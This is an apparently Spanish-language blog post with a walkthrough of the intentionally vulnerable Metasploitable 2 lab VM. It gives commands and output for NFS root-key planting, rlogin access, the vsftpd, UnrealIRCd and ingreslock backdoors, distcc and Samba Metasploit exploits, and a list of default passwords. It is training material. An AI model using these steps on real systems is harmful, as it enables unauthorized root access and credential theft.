21/12/2016 HackNode: Gua de Explotabilidad de Metasploitable 2

1 Ms Siguiente blog elvysemerson@[Link] Escritorio Salir

HackNode
You can hack some stuff too!

mircoles, 13 de junio de 2012 Twitter

Tweets by @DarkOperator
Gua de Explotabilidad de Metasploitable 2
Metasploitable 2
Seguidores
La mquina virtual Metasploitable es una versin de Ubuntu Linux intencionalmente
vulnerable diseada para probar herramientas de seguridad y demostrar vulnerabilidades Seguidores (22) Siguiente
comunes. La versin 2 de esta mquina virtual se encuentra disponible para la descarga
desde [Link] y contiene an muchas ms vulnerabilidades que la imgen original.
Esta mquina virtual es compatible con VMWare, VirtualBox, y otras plataformas de
virtualizacin comunes. De manera predeterminada, las interfaces de red de Metasploitable
se encuentran atadas a los adaptadores de red NAT y Host-only, y la imagen no debe
exponerse a una red hostl. Este artculo describe muchas de las fallas de seguridad en la
imagen de Metasploitable 2. En la actualidad hace falta documentacin sobre el servidor
web y las fallas de aplicaciones web, as como las vulnerabilidades que permiten a un
usuario local escalar a privilegios de root.

Este documento se seguir ampliando con el tiempo a medida que muchos de los defectos
menos evidentes en esta plataforma se vayan encontrando.
Seguir

Primeros Pasos
Archivo del blog
Despus de arrancar la mquina virtual, inicie sesin en la consola con el usuario msfadmin
y contrasea msfadmin. Desde la shell, ejecute el comando ifconfig para identificar la 2013 (4)
direccin IP.
2012 (13)
septiembre (2)
1 msfadmin@metasploitable:~$ ifconfig ?
2 agosto (5)
3 eth0 Link encap:Ethernet HWaddr [Link]
4 junio (2)
inet addr:[Link] Bcast:[Link] Mask:[Link]
5 inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link Gua de
6 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Explotabilidad
de
Metasploitable
2
Cmo
Servicios defendernos de
los Google
Hackers
Desde nuestro sistema de ataque (Linux, preferiblemente algo como Backtrack),
identificaremos los servicios de red abiertos en esta mquina virtual utilizando el Scanner de mayo (2)
Seguridad Nmap. La siguiente lnea de comando analizar todos los puertos TCP en la
instancia de Metasploitable 2: marzo (1)
febrero (1)
1 root@ubuntu:~# nmap -p0-65535 [Link] ?
2 Starting Nmap 5.61TEST4 ( [Link] ) at 2012-05-31 21:14 PDT 2011 (23)
3 Nmap scan report for [Link]
4 Host is up (0.00028s latency). 2010 (2)
5 Not shown: 65506 closed ports
6 PORT STATE SERVICE
7 21/tcp open ftp
8 22/tcp open ssh
Datos personales
9 23/tcp open telnet
10 25/tcp open smtp
11 53/tcp open domain
12 80/tcp open http
13 111/tcp open rpcbind
14 139/tcp open netbios-ssn
15 445/tcp open microsoft-ds
16 512/tcp open exec
[Link] 1/6
21/12/2016 HackNode: Gua de Explotabilidad de Metasploitable 2
16 512/tcp open exec DarkOperator
17 513/tcp open login
18 514/tcp open shell Alpha_Geek/Daddy/Ethical_Ha
19 1099/tcp open rmiregistry cker/InfoSec_Professional/Co
20 1524/tcp open ingreslock mic_Fanboy/Clone_Trooper
21 2049/tcp open nfs
22 2121/tcp open ccproxy-ftp Ver todo mi perfil
23 3306/tcp open mysql
24 3632/tcp open distccd
25 5432/tcp open postgresql
26 5900/tcp open vnc
27 6000/tcp open X11
28 6667/tcp open irc
29 6697/tcp open unknown
30 8009/tcp open ajp13
31 8180/tcp open unknown
32 8787/tcp open unknown
33 39292/tcp open unknown
34 43729/tcp open unknown
35 44813/tcp open unknown
36 55852/tcp open unknown
37 MAC Address: [Link] (VMware)

Casi todos estos servicios en escucha proporcionan un punto de entrada remoto en el

sistema. En la siguiente seccin, caminaremos a travs de algunos de estos vectores.

Servicios: Bses de Unix

Los puertos TCP 512, 513, y 514 son conocidos como los servicios "r", y han sido
configurados errneamente para permitir acceso remoto desde cualquier mquina (una
situacin tpica ".rhosts + +"). Para tomar ventaja de esto, nos aseguraremos de que el
cliente rsh-client se encuentre instalado (en Ubuntu), y ejecutamos el siguiente comando
como usuario root local. Si se nos solicita una llave SSH, esto significa que las herramientas
rsh-client no han sido instaladas y Ubuntu est predeterminando a utilizar SSH.

1 # rlogin -l root [Link] ?

2 Last login: Fri Jun 1 [Link] EDT 2012 from :0.0 on pts/0
3 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 [Link] UTC 2008 i686
4 root@metasploitable:~#

Esto se pone tan bueno como se v. El prximo servicio que debe tener en cuenta es el
sistema de archivos de red (NFS). NFS puede ser identificado sondeando el puerto 2049
directamente o pidiendo a portmapper obtener una lista de servicios. El siguiente ejemplo
usando rpcinfo para identificar NFS y showmount -e para determinar que el recurso
compartido "/" (la raz del sistema de archivos) estar siendo exportado. Necesitaremos los
paquetes de Ubuntu rpcbind y nfs-common para seguir adelante.

1 root@ubuntu:~# rpcinfo -p [Link] ?

2 program vers proto port service
3 100000 2 tcp 111 portmapper
4 100000 2 udp 111 portmapper
5 100024 1 udp 53318 status
6 100024 1 tcp 43729 status
7 100003 2 udp 2049 nfs
8 100003 3 udp 2049 nfs
9 100003 4 udp 2049 nfs
10 100021 1 udp 46696 nlockmgr
11 100021 3 udp 46696 nlockmgr
12 100021 4 udp 46696 nlockmgr
13 100003 2 tcp 2049 nfs
14 100003 3 tcp 2049 nfs
15 100003 4 tcp 2049 nfs
16 100021 1 tcp 55852 nlockmgr
17 100021 3 tcp 55852 nlockmgr
18 100021 4 tcp 55852 nlockmgr
19 100005 1 udp 34887 mountd
20 100005 1 tcp 39292 mountd
21 100005 2 udp 34887 mountd
22 100005 2 tcp 39292 mountd
23 100005 3 udp 34887 mountd
24 100005 3 tcp 39292 mountd
25
26 root@ubuntu:~# showmount -e [Link]
27 Export list for [Link]:
[Link] 2/6
21/12/2016 HackNode: Gua de Explotabilidad de Metasploitable 2
27 Export list for [Link]:
28 / *

Obtener acceso a un sistema con un sistema de archivos modificable como este es algo
trivial. Para que sea as (y porque SSH est ejecutndose), generaremos una nueva llave
SSH en nuestro sistema atacante, montamos el export NFS y agregamos nuestra llave al
archivo authorized_keys de la cuenta de usuario root:

1 root@ubuntu:~# ssh-keygen ?
2 Generating public/private rsa key pair.
3 Enter file in which to save the key (/root/.ssh/id_rsa):
4 Enter passphrase (empty for no passphrase):
5 Enter same passphrase again:
6 Your identification has been saved in /root/.ssh/id_rsa.
7 Your public key has been saved in /root/.ssh/id_rsa.pub.
8
9 root@ubuntu:~# mkdir /tmp/r00t
10 root@ubuntu:~# mount -t nfs [Link]:/ /tmp/r00t/
11 root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
12 root@ubuntu:~# umount /tmp/r00t
13
14 root@ubuntu:~# ssh root@[Link]
15 Last login: Fri Jun 1 [Link] 2012 from [Link]
16 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 [Link] UTC 2008 i686
17
18 root@metasploitable:~#

Servicios: Backdoors

En el puerto 21, Metasploitable 2 ejecuta vsftpd, un servidor FTP popular. Esta versin en
particular contiene una puerta trasera (backdoor) que fue introducida en el cdigo fuente por
un intruso desconocido. El backdoor fue rpidamente identificado y eliminado, pero no antes
de que unas cuantas personas ya lo hubieran descargado. Si un nombre de usuario es
enviado terminando con la secuencia " :) " (carita felz), la versin con el backdoor abrir una
shell en escucha en el puerto 6200. Podemos demostrar esto con telnet o utilizando un
mdulo de Metasploit Framework para explotarlo automticamente:

1 root@ubuntu:~# telnet [Link] 21 ?

2 Trying [Link]...
3 Connected to [Link].
4 Escape character is '^]'.
5 220 (vsFTPd 2.3.4)
6 user backdoored:)
7 331 Please specify the password.
8 pass invalid
9 ^]
10 telnet> quit
11 Connection closed.
12
13 root@ubuntu:~# telnet [Link] 6200
14 Trying [Link]...
15 Connected to [Link].
16 Escape character is '^]'.
17 id;
18 uid=0(root) gid=0(root)

En el puerto 6667, Metasploitable 2 corre el demonio IRC UnreaIRCD. Esta versin contiene
un backdoor que pas desapercibido por meses, - disparado al enviar las letras "AB"
seguidas de un comando del sistema al servidor en cualquier puerto en escucha. Metasploit
tiene un mdulo para explotar esto con el fin de obtener una shell interactiva, como se
muestra a continuacin.

1 msfconsole ?
2 msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
3 msf exploit(unreal_ircd_3281_backdoor) > set RHOST [Link]
4 msf exploit(unreal_ircd_3281_backdoor) > exploit
5 [*] Started reverse double handler
6 [*] Connected to [Link]:6667...
7 :[Link] NOTICE AUTH :*** Looking up your hostname
8 :[Link] NOTICE AUTH :*** Couldn't resolve your
9 [*] Sending backdoor command...
[Link] 3/6
21/12/2016 HackNode: Gua de Explotabilidad de Metasploitable 2
9 [*] Sending backdoor command...
10 [*] Accepted the first client connection...
11 [*] Accepted the second client connection...
12 [*] Command: echo 8bMUYsfmGvOLHBxe;
13 [*] Writing to socket A
14 [*] Writing to socket B
15 [*] Reading from sockets...
16 [*] Reading from socket B
17 [*] B: "8bMUYsfmGvOLHBxe\r\n"
18 [*] Matching...
19 [*] A is input...
20 [*] Command shell session 1 opened ([Link]:4444 -> [Link]:60257) at 2012-05-31 [Link] -0
21
22 id
23 uid=0(root) gid=0(root)

Mucho menos sutl es el viejo backdoor remanente "ingreslock" que escucha en el puerto
1524. El puerto ingreslock era una opcin popular hace una dcada para agregar una puerta
trasera a un servidor comprometido. Accederlo es fcil:

1 root@ubuntu:~# telnet [Link] 1524 ?

2 Trying [Link]...
3 Connected to [Link].
4 Escape character is '^]'.
5 root@metasploitable:/# id
6 uid=0(root) gid=0(root) groups=0(root)

Servicios: Backdoors No-Intencionales

Adems de las puertas traseras maliciosas de la seccin anterior, algunos servicios son casi
puertas traseras por su propia naturaleza. El primero de estos que est instalado en
Metasploitable 2 es distccd. Este programa hace que sea fcil escalar grandes tareas de
compilacin a travs de una granja de sistemas que aparentan estar configurados para tal
fin. El problema con este servicio es que un atacante puede abusar de este para ejecutar un
comando a su eleccin, como lo demuestra el uso del mdulo de Metasploit a continuacin.

1 msfconsole ?
2 msf > use exploit/unix/misc/distcc_exec
3 msf exploit(distcc_exec) > set RHOST [Link]
4 msf exploit(distcc_exec) > exploit
5
6 [*] Started reverse double handler
7 [*] Accepted the first client connection...
8 [*] Accepted the second client connection...
9 [*] Command: echo uk3UdiwLUq0LX3Bi;
10 [*] Writing to socket A
11 [*] Writing to socket B
12 [*] Reading from sockets...
13 [*] Reading from socket B
14 [*] B: "uk3UdiwLUq0LX3Bi\r\n"
15 [*] Matching...
16 [*] A is input...
17 [*] Command shell session 1 opened ([Link]:4444 -> [Link]:38897) at 2012-05-31 [Link] -0
18
19 id
20 uid=1(daemon) gid=1(daemon) groups=1(daemon)

Samba, cuando se configura con un recurso de archivos compartidos y enlaces extensos

(wide links) habilitados (los cuales vienen activados por defecto), puede utilizarse tambien
como un tipo de puerta trasera para acceder archivos que no estaban destinados a ser
compartidos. El siguiente ejemplo utiliza un mdulo de Metasploit para proporcionar acceso
al sistema de archivos raz utilizando una conexin annima y un recurso compartido con
acceso de escritura.

1 root@ubuntu:~# smbclient -L //[Link] ?

2 Anonymous login successful
3 Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
4 Sharename Type Comment
5 --------- ---- -------

6 print$ Disk Printer Drivers

[Link] 4/6
21/12/2016 HackNode: Gua de Explotabilidad de Metasploitable 2
6 print$ Disk Printer Drivers
7 tmp Disk oh noes!
8 opt Disk
9 IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
10 ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
11
12 root@ubuntu:~# msfconsole
13 msf > use auxiliary/admin/smb/samba_symlink_traversal
14 msf auxiliary(samba_symlink_traversal) > set RHOST [Link]
15 msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
16 msf auxiliary(samba_symlink_traversal) > exploit
17
18 [*] Connecting to the server...
19 [*] Trying to mount writeable share 'tmp'...
20 [*] Trying to link 'rootfs' to the root filesystem...
21 [*] Now access the following share to browse the root filesystem:
22 [*] \\[Link]\tmp\rootfs\
23
24 msf auxiliary(samba_symlink_traversal) > exit
25
26 root@ubuntu:~# smbclient //[Link]/tmp
27 Anonymous login successful
28 Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
29 smb: \> cd rootfs
30 smb: \rootfs\> cd etc
31 smb: \rootfs\etc\> more passwd
32 getting file \rootfs\etc\passwd of size 1624 as /tmp/[Link] (317.2 KiloBytes
33 root:x:0:0:root:/root:/bin/bash
34 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
35 bin:x:2:2:bin:/bin:/bin/sh
36 [..]

Contraseas Dbiles

Adicionalmente a las ms flagrantes puertas traseras y errores de configuracin,

Metasploitable 2 tiene terrible seguridad de contrasea tanto para la cuenta del sistema
como para la cuenta del servidor de base de datos. El usuario principal de administracin
msfadmin tiene una contrasea que coincide con el nombre de usuario. Al descubrir la lista
de los usuarios en este sistema, ya sea mediante el uso de otro defecto para capturar el
archivo passwd, o mediante la enumeracin de estos identificadores de usuario a travs de
Samba, un ataque de fuerza bruta puede ser utilizado para acceder rpidamente a varias
cuentas de usuario. Como mnimo, las siguientes cuentas dbiles del sistema estn
configuradas en el sistema.

Nombre Cuenta Contrasea

msfadmin msfadmin
user user
postgres postgres
sys batman

klog 123456789
service service

Adicional a estas cuentas a nivel de sistema, el servicio de PostgreSQL puede ser accedido
con el nombre de usuario postgres y contrasea postgres, mientras que el servicio de
MySQL est abierto con el nombre de usuario root y con una contrasea en blanco. El
servicio de VNC proporciona el acceso de escritorio remoto a travs de la contrasea
password.

Crossposted from Metasploitable 2 Exploitability Guide

Publicado por DarkOperator en 2:25

+1 Recomendar esto en Google

Etiquetas: backdoor, Backtrack, linux, Metasploit, Metasploitable, Metasploitable2,

msfadmin, NFS, Nmap, postgres, Samba, SSH, Ubuntu, unix, vsftpd

[Link] 5/6
21/12/2016 HackNode: Gua de Explotabilidad de Metasploitable 2

Entrada ms reciente Pgina principal Entrada antigua

Plantilla Fantstico, S.A.. Con la tecnologa de Blogger.

[Link] 6/6